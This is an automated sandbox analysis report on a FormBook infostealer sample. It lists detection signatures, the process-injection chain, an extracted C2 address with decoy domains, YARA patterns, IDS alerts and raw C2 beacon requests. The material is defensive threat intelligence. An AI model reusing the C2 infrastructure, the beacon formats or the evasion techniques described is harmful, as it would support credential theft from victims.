
Analysis Report eQLPRPErea.exe

Overview

General Information

Sample Name: eQLPRPErea.exe
Analysis ID: 383832
MD5: 2c64897aa30694cc768f5ea375157932
SHA1: c897f37780a5237d5c330bcf2668745201b38ff5
SHA256: 18d465a5867ee069480bb9be8eb259be41cc008e487b7b6a3cad14e3559963a9
Tags: exe, Formbook
Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • eQLPRPErea.exe (PID: 6876 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)
    • eQLPRPErea.exe (PID: 6956 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 4832 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6616 cmdline: /c del 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author
3.2.eQLPRPErea.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.eQLPRPErea.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.eQLPRPErea.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158c9:$sqlite3step: 68 34 1C 7B E1
  • 0x159dc:$sqlite3step: 68 34 1C 7B E1
  • 0x158f8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a1d:$sqlite3text: 68 38 2A 90 C5
  • 0x1590b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p | Avira URL Cloud: Label: malware
Source: http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 | Avira URL Cloud: Label: malware
Source: http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH | Avira URL Cloud: Label: malware
Source: http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p | Avira URL Cloud: Label: malware
Source: http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p | Avira URL Cloud: Label: malware
Source: http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p | Avira URL Cloud: Label: malware
Source: http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}
Multi AV Scanner detection for submitted file
Source: eQLPRPErea.exe | Virustotal: Detection: 28%
Source: eQLPRPErea.exe | ReversingLabs: Detection: 31%
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 3.2.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.eQLPRPErea.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.1.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.eQLPRPErea.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 3.2.eQLPRPErea.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.wlanext.exe.8bf110.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.eQLPRPErea.exe.1eb20000.5.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.1.eQLPRPErea.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.wlanext.exe.3597960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: eQLPRPErea.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: eQLPRPErea.exe, 00000001.00000003.692305861.000000001ECE0000.00000004.00000001.sdmp, eQLPRPErea.exe, 00000003.00000002.736314312.0000000000B5F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.955250714.000000000317F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: eQLPRPErea.exe, wlanext.exe
Source: Binary string: wlanext.pdb | source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL | source: eQLPRPErea.exe, 00000003.00000002.736943919.00000000026B0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000002.964029723.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_0040531D DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_00405CB0 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 1_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\eQLPRPErea.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49734 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49737 -> 13.248.216.40:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49758 -> 64.190.62.111:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49765 -> 91.195.240.94:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49768 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.stone-master.info/aqu2/
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.nagoyadoori.xyz
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1 | Host: www.biehnrecords.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.bedpee.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.pmrack.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1 | Host: www.serversexposed.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.heliumhubs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1 | Host: www.420vaca.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.shujahumayun.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8qPweG0Om7gnfxctK98F/0dsoL0lvZuH4d0zJ/AKmRPMF5KPhADxZAlCqmjmmKP5/AO4 HTTP/1.1 | Host: www.dottproject.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=toEAtfXwLESsnLakC+2t7dOdvm85giv91w8vwljOeFfqXEeY4s07KiqgA7NZtvHKIujf&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.qcmax.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH HTTP/1.1 | Host: www.playfulpainters.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.autobrehna.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1 | Host: www.appgusher.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1 | Host: www.thesixteenthround.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View | ASN Name: SEDO-ASDE SEDO-ASDE
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: unknown | DNS traffic detected: queries for: www.biehnrecords.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 08 Apr 2021 08:49:05 GMT | Server: Apache/2.4.41 (Ubuntu) | Content-Length: 276 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 6d 72 61 63 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.pmrack.com Port 80</address></body></html>
Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmp | String found in binary or memory: http://browsehappy.com/
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: wlanext.exe, 00000009.00000002.955588839.0000000003712000.00000004.00000001.sdmp | String found in binary or memory: http://produkte.web.de/homepage-und-mail/homepage-parken/
Source: explorer.exe, 00000005.00000002.955671038.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.716972181.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
